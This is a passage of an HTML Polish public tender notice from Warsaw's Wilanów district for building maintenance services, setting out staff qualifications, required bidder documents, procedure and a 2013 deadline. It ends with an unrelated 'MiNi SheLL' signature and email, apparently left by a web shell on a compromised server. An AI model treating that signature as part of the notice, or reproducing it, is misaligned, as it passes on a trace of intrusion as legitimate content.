- 1 osobę posiadającą świadectwo kwalifikacyjne z zakresu eksploatacji urządzeń, instalacji i sieci elektroenergetycznych do 1 kV, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89 poz. 828, ze zm.),
- 1 osobę posiadającą świadectwo kwalifikacyjne do wykonywania pomiarów ochronnych urządzeń elektrycznych do 1 kV, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89 poz. 828, ze zm.), 
- 1 pracownika do konserwacji i napraw instalacji wod.-kan. i c.o.,
- 1 pracownika do konserwacji i napraw wentylacji i klimatyzacji;
B) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz Oferty - wg wzoru stanowiącego załącznik nr 1 do SIWZ.
2. Dokument zawierający dane aktualne na dzień składania ofert (np. odpis z KRS, wpis do Centralnej Ewidencji i Informacji o Działalności Gospodarczej) potwierdzający, że oferta została podpisana przez osobę (-y) właściwie umocowaną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące zmiany postanowień umowy:
- § 4 pkt 4 wzoru umowy - W przypadku ustawowej zmiany obowiązujących stawek podatku VAT kwota wynagrodzenia brutto pozostaje bez zmian. Kwota wynagrodzenia netto zostanie przeliczona według obowiązujących stawek podatku VAT, w stosunku do kwoty wynagrodzenia bazowego brutto;
- § 6 pkt 3 wzoru umowy - Zamawiający dopuszcza możliwość zmiany Podwykonawcy z zastrzeżeniem, że jeśli Wykonawca, w procedurze udzielenia niniejszego zamówienia, posłużył się doświadczeniem Podwykonawcy, nowy Podwykonawca musi również wykazać się doświadczeniem wymaganym przez Zamawiającego w procedurze o udzielenie zamówienia będącego przedmiotem umowy;
- § 7 pkt 5 wzoru umowy - Zmiana osób/oby wyznaczonych do współpracy ze strony Zamawiającego i Wykonawcy, wymienionych w ust. 1 i 2, wymaga niezwłocznego poinformowania drugiej strony o tym fakcie na piśmie. Takie zmiany nie wymagają aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wilanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd m.st. Warszawy Dzielnica Wilanów Wydział Zamówień publicznych i Zezwoleń
02-958 Warszawa, ul. St. Kostki Potockiego 11,  pok. 407.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2013 godzina 10:00, miejsce: Urząd m.st. Warszawy Dzielnica Wilanów Wydział Zamówień publicznych i Zezwoleń
02-958 Warszawa, ul. St. Kostki Potockiego 11, pokój 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com